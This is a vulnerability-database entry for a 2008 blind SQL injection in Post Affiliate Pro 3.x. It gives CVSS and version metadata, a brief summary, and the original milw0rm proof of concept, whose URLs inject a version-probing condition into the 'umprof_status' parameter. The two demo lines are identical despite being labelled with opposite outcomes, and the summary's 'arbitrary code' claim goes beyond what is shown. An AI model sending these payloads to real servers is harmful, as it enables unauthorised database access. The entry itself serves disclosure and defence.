Post Affiliate Pro v.3 (index.php md)

vendor:

Post Affiliate Pro

by:

XaDoS

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Post Affiliate Pro

Affected Version From: 3

Affected Version To: 3.0.3.2

Patch Exists: Yes

Related CWE: N/A

CPE: a:qualityunit:post_affiliate_pro:3.0.3.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection

Post Affiliate Pro v.3 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'umprof_status' in the 'index.php' file. This can allow the attacker to gain access to the database and execute arbitrary code.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

[â– ]  Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection

 
>Â©<

> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> BÂ§g: Blind $ql inJection
> SIte vuln: http://www.qualityunit.com/postaffiliatepro/

>Â©<
 
 
[â– ] ExPL0iT:
 
|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] 
 
 [you must be merchants]

[â– ] DÂ£M0: 
 
|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NOÂ°Â°]
 
|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] 
 

 
[â– ] Th4nKs::
 
\> Str0ke </
\> Joy Division </
\> Teo Babbeo </
\> Spud </
\> Loooo Z00ooo00oo0 </  Lol ;-)

# milw0rm.com [2008-11-26]